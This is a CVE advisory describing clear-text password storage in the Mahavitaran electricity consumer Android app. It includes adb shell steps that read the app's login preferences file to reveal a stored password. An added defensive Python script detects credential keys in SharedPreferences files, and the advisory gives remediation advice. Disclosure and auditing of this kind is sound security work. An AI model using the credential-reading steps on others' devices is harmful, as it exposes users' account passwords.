CVE-2020-27413 Mahavitaran Android Application: Clear-text password storage

Vulnerable Software: Maharashtra State Electricity Board Android Application

Vulnerability: Clear-text password storage

Affected Version: 7.50 and prior

Patched: Yes

Vendor Homepage:

App store link:

CVE: CVE-2020-27413

CVE Author: Tejas Nitin Pingulkar

Exploit Available: POC Available

About Affected Software

The official consumer app by Mahavitaran (M.S.E.D.C.L.). The Mahavitaran Consumer App lets consumers access Mahavitaran services at their fingertips. The app is simple and easy to use, and it provides transparency in delivering services to consumers.

Features:

* View and pay bill
* Register and track complaints
* View bill and payment history
* Manage multiple electricity connections
* Contact 24x7 MSEDCL Call Center
* Apply for new connection
* Know the status of new connection application and pay estimate charges
* Submit meter reading to avoid average billing
* Provide feedback about Mahavitaran services
* Update contact details (mobile number & e-mail ID) of consumer
* Find MSEDCL offices and collection centers near you
* Estimate your monthly electricity consumption and bill amount
* Get information about the feeder from which the power supply is provided to your connection
* Apply for the change of name
* Submit an application for addition/reduction in load


Steps to Reproduce

1. Log in using the app.
2. Connect to the device over adb shell.
3. Once connected to the adb shell, run the commands below:
cd /data/data/
cat pref_login_info.xml
4. The password is disclosed in clear text in the shared preferences file.
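The check below is an added example, not part of the original advisory: it parses an Android SharedPreferences XML file of the kind read in the steps above and flags string entries whose key names suggest a credential stored in clear text. The sample file contents and key names (consumer_no, password, session_token, remember_me) are constructed for illustration and are not the app's real keys; the real file is the pref_login_info.xml named in the steps.

```python
"""Audit an Android SharedPreferences XML file for clear-text credentials.

SharedPreferences files live under the app's data directory in
shared_prefs/ and are plain XML: a <map> root containing <string>,
<boolean>, <int>, <long>, <float> and <set> children, each with a
name attribute. Anything written there with putString() is readable
by anyone who can read the file (root, backups, adb on a rooted device).
"""
import re
import xml.etree.ElementTree as ET

# Key names that usually hold something that should never be persisted
# unencrypted. Extend to match the naming conventions of the app under test.
SENSITIVE_KEY = re.compile(r"(pass(word|wd)?|pwd|secret|token|pin|otp)", re.IGNORECASE)

# Constructed sample; the key names and values are NOT from the real app.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="consumer_no">000000000000</string>
    <string name="password">S3cretPassw0rd</string>
    <boolean name="remember_me" value="true" />
    <string name="session_token">abc123</string>
</map>
"""


def parse_shared_prefs(xml_text):
    """Return {name: value} for every entry in a SharedPreferences <map>.

    Strings keep their text, sets become a list of strings, and the
    primitive types keep the literal text of their value attribute.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "map":
        raise ValueError("not a SharedPreferences file: root element is not <map>")
    entries = {}
    for child in root:
        name = child.get("name")
        if name is None:
            continue
        if child.tag == "string":
            entries[name] = child.text or ""
        elif child.tag == "set":
            entries[name] = [v.text or "" for v in child.findall("string")]
        else:
            entries[name] = child.get("value", "")
    return entries


def find_cleartext_secrets(entries):
    """Return the names of entries that look like credentials held as plain strings."""
    findings = []
    for name, value in entries.items():
        if SENSITIVE_KEY.search(name) and isinstance(value, str) and value:
            findings.append(name)
    return findings


def audit(xml_text):
    """Parse a SharedPreferences file and return the suspicious key names."""
    return find_cleartext_secrets(parse_shared_prefs(xml_text))


if __name__ == "__main__":
    for key in audit(SAMPLE_PREFS):
        print(f"clear-text secret stored under key {key!r}")
```

On a real assessment, point audit() at the contents of each file under the app's shared_prefs/ directory; a hit on a key such as "password" is exactly the finding this CVE describes. The fix on the app side is not to persist the password at all (keep only a short-lived server-issued token), and to keep whatever must be stored in androidx.security.crypto's EncryptedSharedPreferences or the Android Keystore, so that the file contents are ciphertext even to a reader with root or adb access.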

Proof Of Concept

CVE-2020-27413 Mahavitaran Android Application: Clear-text password storage
